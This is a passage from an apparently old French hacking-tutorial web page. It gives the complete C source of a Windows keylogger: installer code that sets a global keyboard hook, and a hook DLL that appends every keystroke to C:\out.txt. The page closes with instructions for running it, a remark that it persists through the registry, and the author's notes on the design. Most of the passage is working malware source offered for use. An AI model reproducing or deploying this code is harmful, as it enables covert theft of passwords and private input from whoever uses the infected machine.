      <tt><font color="#000099">&nbsp;</font></tt> <br>
      <tt><font color="#000099">&nbsp;hHook=SetWindowsHookEx(WH_KEYBOARD,addr,hModDLL,NULL);&nbsp;&nbsp;&nbsp;</font><font color="#006600"> 
      // On met le hook</font></tt> <br>
      <tt><font color="#000099">&nbsp;if(hHook==NULL) { return FALSE; }</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">&nbsp;buffer=(char *)GlobalAlloc(GPTR,100);</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;writebuf=(char *)GlobalAlloc(GPTR,500);</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;time=(char *)GlobalAlloc(GPTR,100);</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;date=(char *)GlobalAlloc(GPTR,100);</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">&nbsp;OutFile=CreateFile("C:\\out.txt",GENERIC_WRITE,&nbsp;&nbsp;&nbsp;&nbsp; 
      </font><font color="#006600">// On cr&eacute;&eacute; un fichier</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; FILE_SHARE_READ+FILE_SHARE_WRITE,</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;</font></tt> <br>
      <tt><font color="#000099">&nbsp;if(OutFile==INVALID_HANDLE_VALUE) { return 
      FALSE; }</font></tt> <br>
      <tt><font color="#000099"></font></tt>&nbsp;<tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">&nbsp;SetFilePointer(OutFile,NULL,NULL,FILE_END);&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font><font color="#006600">&nbsp; 
      // On va &agrave; la fin</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">&nbsp;size=50;</font></tt> <br>
      <tt><font color="#000099">&nbsp;GetUserNameA(buffer,&amp;size);&nbsp;&nbsp;&nbsp; 
      </font><font color="#006600">// On choppe le username</font></tt> <br>
      <tt><font color="#000099">&nbsp;GetTimeFormat(LOCALE_SYSTEM_DEFAULT,TIME_NOSECONDS,NULL,"HH':'mm 
      tt",time,50);</font></tt> <br>
      <tt><font color="#000099">&nbsp;GetDateFormat(LOCALE_SYSTEM_DEFAULT,DATE_LONGDATE,NULL,NULL,date,50);</font></tt> 
      <br>
      <tt><font color="#006600">// on a la date et l'heure pour mettre dans le 
      fichier</font></tt> <br>
      <tt><font color="#000099"></font></tt>&nbsp;<tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">&nbsp;wsprintf(writebuf,"\x0d\x0a\x0d\x0a&nbsp;&nbsp;&nbsp; 
      username : %s \x0d\x0a&nbsp;&nbsp;&nbsp; Date : %s \x0d\x0a&nbsp;&nbsp;&nbsp; 
      Time : %s.\x0d\x0a&nbsp;&nbsp;&nbsp; All keys are being logged in this file 
      :) \x0d\x0a\x0d\x0a",buffer,date,time);</font></tt> <br>
      <tt><font color="#000099">&nbsp;WriteFile(OutFile,writebuf,strlen(writebuf),&amp;temp,NULL);</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#006600">// On &eacute;crit tout &ccedil;a dans notre 
      file pour faire boooo</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">GlobalFree(buffer);</font></tt> <br>
      <tt><font color="#000099">GlobalFree(writebuf);</font></tt> <br>
      <tt><font color="#000099">GlobalFree(time);</font></tt> <br>
      <tt><font color="#000099">GlobalFree(date);</font></tt> <br>
      <tt><font color="#000099">return TRUE;</font></tt> <br>
      <tt><font color="#000099">}</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">int UninstallHook(){&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font><font color="#006600"> 
      // No comment</font></tt> <br>
      <tt><font color="#000099">UnhookWindowsHookEx(hHook);</font></tt> <br>
      <tt><font color="#000099">return TRUE;</font></tt> <br>
      <tt><font color="#000099">}</font></tt> <br>
      <tt><font color="#006600">//&nbsp; EOF</font></tt> <br>
      <tt><font color="#000099"></font></tt>&nbsp;
  </blockquote>
  <tt><font face="Verdana, Arial, Helvetica, sans-serif" size="2">-----CUT HERE----------CUT 
  HERE----------CUT HERE----------CUT HERE----------CUT HERE-----</font></tt> 
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Et maintenant, 
    la DLL ! </font>
  <p> 
    <center>
      <font color="#990000" face="Verdana, Arial, Helvetica, sans-serif" size="2">*DLL 
      CHARGEE PAR LE KEYLOGGER*</font> 
    </center>
    <font face="Verdana, Arial, Helvetica, sans-serif" size="2"><tt>-----CUT HERE----------CUT 
    HERE----------CUT HERE----------CUT HERE----------CUT HERE-----</tt> </font>
  <p><tt><font color="#006600">/*</font></tt> <br>
    <tt><font color="#006600">Library hook.dll charg&eacute;e par le keylogger</font></tt> 
    <br>
    <tt><font color="#006600">by obscurer</font></tt><tt><font color="#006600"></font></tt> 
  <p><tt><font color="#006600">21/08/2k</font></tt> <br>
    <tt><font color="#006600">Copyright Tipiak - www.tipiak.net -</font></tt> 
    <br>
    <tt><font color="#006600">*/</font></tt><tt><font color="#000099"></font></tt> 
  <p><tt><font color="#000099">#include &lt;windows.h></font></tt><tt><font color="#000099"></font></tt> 
  <p><tt><font color="#000099">BOOL WINAPI DllEntryPoint(HINSTANCE hinstDLL,DWORD 
    fdwReason,LPVOID lpvReserved)</font></tt> <br>
    <tt><font color="#000099">{</font></tt> <br>
    <tt><font color="#000099">return TRUE;</font></tt> <br>
    <tt><font color="#000099">}</font></tt> <br>
    <tt><font color="#000099"></font></tt>&nbsp;<tt><font color="#000099"></font></tt> 
  <p><tt><font color="#000099">__declspec(dllexport) LRESULT CALLBACK KeyboardProc(int 
    code,WPARAM wParam,LPARAM lParam)</font></tt> <br>
    <tt><font color="#000099">{</font></tt> <br>
    <tt><font color="#000099">&nbsp;</font></tt> <br>
    <tt><font color="#000099">HANDLE File;</font></tt> <br>
    <tt><font color="#000099">long TEMP;</font></tt> <br>
    <tt><font color="#000099">char *buf;</font></tt> <br>
    <tt><font color="#000099">unsigned char *KeyState;</font></tt> <br>
    <tt><font color="#000099">DWORD temp;</font></tt><tt><font color="#000099"></font></tt> 
  <p><tt><font color="#000099">buf=(char *)GlobalAlloc(GPTR,5);</font></tt> <br>
    <tt><font color="#000099">KeyState=(unsigned char *)GlobalAlloc(GPTR,256);</font></tt><tt><font color="#000099"></font></tt> 
  <p><tt><font color="#006600">/*</font></tt> <br>
    <tt><font color="#006600">Le bit 31 de lParam (0x40000000 en hexa donc), est 
    &agrave; 1 si la touche relach&eacute;e, ou &agrave; 0 si elle</font></tt> 
    <br>
    <tt><font color="#006600">est pr&eacute;ss&eacute;e. On fait donc un AND pour 
    savoir l'&eacute;tat du bit 31, si la touche est tapp&eacute;e, on</font></tt> 
    <br>
    <tt><font color="#006600">continue et on la log, sinon, on quitte (pour ne 
    pas logger 2 fois la m&ecirc;me touche &agrave; chaque coup)</font></tt> <br>
    <tt><font color="#006600">*/</font></tt><tt><font color="#000099"></font></tt> 
  <p><tt><font color="#000099">TEMP=lParam;</font></tt> <br>
    <tt><font color="#000099">TEMP&amp;=0x40000000;</font></tt> <br>
    <tt><font color="#000099">if(TEMP!=0) { goto die_now; }</font></tt><tt><font color="#000099"></font></tt> 
  <p><tt><font color="#000099">&nbsp;File=CreateFile("C:\\out.txt",GENERIC_WRITE,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
    </font><font color="#006600">// On ouvre le fichier</font></tt> <br>
    <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; FILE_SHARE_READ+FILE_SHARE_WRITE,</font></tt> 
    <br>
    <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);</font></tt> 
    <br>
    <tt><font color="#000099">&nbsp;</font></tt> <br>
    <tt><font color="#000099">&nbsp;if(File==INVALID_HANDLE_VALUE) {&nbsp; goto 
    die_now; }</font></tt><tt><font color="#000099"></font></tt> 
  <p><tt><font color="#000099">&nbsp;SetFilePointer(File,NULL,NULL,FILE_END);&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font><font color="#006600">&nbsp; 
    // On se place &agrave; la fin</font></tt><tt><font color="#000099"></font></tt> 
  <p><tt><font color="#000099">GetKeyboardState(KeyState);&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font><font color="#006600"> 
    // On choppe l'&eacute;tat du clavier</font></tt> <br>
    <tt><font color="#000099">ToAscii(wParam,lParam,KeyState,(unsigned short *)buf,0);&nbsp;&nbsp;&nbsp;</font><font color="#006600"> 
    // buf contient le code ASCII</font></tt><tt><font color="#000099"></font></tt> 
  <p><tt><font color="#000099">WriteFile(File,buf,strlen(buf),&amp;temp,NULL);&nbsp;&nbsp;&nbsp; 
    </font><font color="#006600">// On balance &ccedil;a dans le file</font></tt> 
    <br>
    <tt><font color="#000099">FlushFileBuffers(File);&nbsp; </font><font color="#006600">// 
    juste au cas ou</font></tt><tt><font color="#000099"></font></tt> 
  <p><tt><font color="#000099">CloseHandle(File); </font><font color="#006600">// 
    ferme le fichier</font></tt><tt><font color="#000099"></font></tt> 
  <p><tt><font color="#000099">die_now:</font></tt><tt><font color="#000099"></font></tt> 
  <p><tt><font color="#000099">GlobalFree(buf);</font></tt> <br>
    <tt><font color="#000099">GlobalFree(KeyState);</font></tt><tt><font color="#000099"></font></tt> 
  <p><tt><font color="#000099">return FALSE;&nbsp;&nbsp;&nbsp; </font><font color="#006600">// 
    return FALSE pour que la touche arrive &agrave; destination</font></tt> <br>
    <tt><font color="#000099">}</font></tt><tt><font color="#000099"></font></tt> 
  <p><tt><font color="#006600">//&nbsp; EOF</font></tt><tt></tt> 
  <p><tt><font face="Verdana, Arial, Helvetica, sans-serif" size="2">-----CUT 
    HERE----------CUT HERE----------CUT HERE----------CUT HERE----------CUT HERE-----</font></tt> 
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">And finally, 
    it was done, comme dirait l'autre ! Mettez l'exe et la dll dans le m&ecirc;me 
    r&eacute;pertoire, lancez le .exe et c bon, les touches <br>
    sont logg&eacute;es dans <tt><font color="#000099">C:\out.txt </font></tt>et 
    le prog est dans la base de registre.Tranquille non ? (non ? Pfff vous &ecirc;tes 
    durs l&agrave; ...) </font><br>
  <hr width="100%">
  <p><a name="4"></a><u><font color="#990000"><font size=+2><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2">IV) 
    Mon avis sur "X-Men le film" / Conclusion</font></b></font></font></u> 
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Pas mal / Pour 
    stopper le Keylogger faites un bon vieux Ctrl-Alt-Suppr et d&eacute;gagez 
    le. <br>
    Je n'ai pas int&eacute;gr&eacute; de fonction qui cache le nom dans la liste, 
    mais sinon, on pourrait pas le stopper alors bon... (en plus j'ai pas cherch&eacute;). 
    Vous avez remarqu&eacute; que &agrave; chaque touche tapp&eacute;e, on ouvre 
    le fichier, on &eacute;crit et on le ferme. Je sais que cela peut para&icirc;tre 
    un peu barbare mais la fonction "KeyboardProc" est copi&eacute;e pour chaque 
    process du syst&egrave;me, et on ne peut pas lui passer d'argument comme un 
    handle de file, de m&ecirc;me elle ne peut pas dialoguer avec le programme 
    principal (une solution potentielle serait d'utiliser les messages, mais alors 
    il faudrait connaitre l'Id de la fen&ecirc;tre &agrave; qui on envoie le m&eacute;ssage, 
    m&ecirc;me probl&egrave;me) Le file mapping reste aussi possible en th&eacute;orie 
    mais je n'y suis pas parvenu n'ayant pas non plus beaucoup insist&eacute;. 
    <br>
    Au risque de me r&eacute;p&eacute;ter, je dirai que je suis d'accord pour 
    qu'on pompe cet article, du moment que j'y vois mon nom. Mes sources pour 
    ce prog vienne de mon exp&eacute;rience personnelle et de Iczelion pour la 
    th&eacute;orie sur les Hooks windows. <br>
    Je vais maintenant savourer les derniers jours de vancances qu'il me reste, 
    et je vous donne rendez-vous &agrave; la rentr&eacute;e pour de nouvelles 
    aventures dans le monde magique de l'informatique :) <br>
    (Quelle Outro minable :/ sorry j'ai pas fait litt&eacute;raire) </font>
  <center>
    <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">A+ les cocos 
      </font>
    <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">obscurer, 21/08/2k</font>
  </center>
  
<p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">IRC : <tt>#tipiak</tt> 
  etc... <br>
  MAIL : <tt>obscurer@tipiak.net&nbsp;</tt> ||&nbsp;&nbsp;<tt> x11@freesurf.fr</tt> 
  (au cas ou)</font> </p>
<p align="center"><img src="images/split.jpg" width="600" height="25"></p>
<p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Fichier 
  associ&eacute;s &agrave; l'articles:<br>
  <a href="files/hook.cpp">hook.cpp</a><br>
  <a href="files/keylog.cpp">keylog.cpp</a> </font></p>
</body>
</html>
